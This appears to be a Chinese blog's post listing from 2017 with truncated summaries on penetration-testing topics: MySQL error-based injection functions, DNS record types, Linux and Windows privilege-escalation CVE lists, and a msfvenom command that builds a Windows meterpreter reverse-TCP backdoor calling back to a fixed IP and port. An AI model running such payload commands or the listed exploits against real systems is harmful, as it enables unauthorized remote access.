该文被密码保护。 阅读全文
posted @ 2017-08-30 07:07 0x03 阅读(2) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2017-08-30 06:43 0x03 阅读(3) 评论(0) 推荐(0) 编辑
摘要: 0x00 – 报错注入 mysql 报错注入, 我们有时候会遇到没有正常数据回显的注入. 这时候就需要报错注入来获得我们需要的数据. 我们经常用到的有 floor(),updatexml(),extractvalue() 通过查找资料发现还有一些函数. 由于这三个比较通用, 也就是在大部分 mysq 阅读全文
posted @ 2017-08-30 06:40 0x03 阅读(1098) 评论(0) 推荐(0) 编辑
摘要: 首先了解下常用域名记录 A记录 IP地址记录,记录一个域名对应的IP地址<!--more--> AAAA记录 IPv6 地址记录,记录一个域名对应的IPv6地址 CNAME记录 别名记录,记录一个主机的别名 MX记录 电子邮件交换记录,记录一个邮件域名对应的IP地址 NS记录 域名服务器记录 ,记录 阅读全文
posted @ 2017-08-30 06:28 0x03 阅读(1222) 评论(0) 推荐(1) 编辑
摘要: #CVE #Description #Kernels CVE-2017-1000367 [Sudo] (Sudo 1.8.6p7 - 1.8.20) CVE-2017-7494 [Samba Remote execution] (Samba 3.5.0-4.6.4/4.5.10/4.4.14) CV 阅读全文
posted @ 2017-08-30 06:22 0x03 阅读(323) 评论(1) 推荐(1) 编辑
摘要: 漏洞列表 #Security Bulletin #KB #Description #Operating System CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/201 阅读全文
posted @ 2017-08-30 06:21 0x03 阅读(531) 评论(1) 推荐(0) 编辑
摘要: 本章节的后门有以下几种 windows -->使用模块“windows/meterpreter/reverse_tcp” 命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.ex 阅读全文
posted @ 2017-08-30 06:13 0x03 阅读(904) 评论(0) 推荐(0) 编辑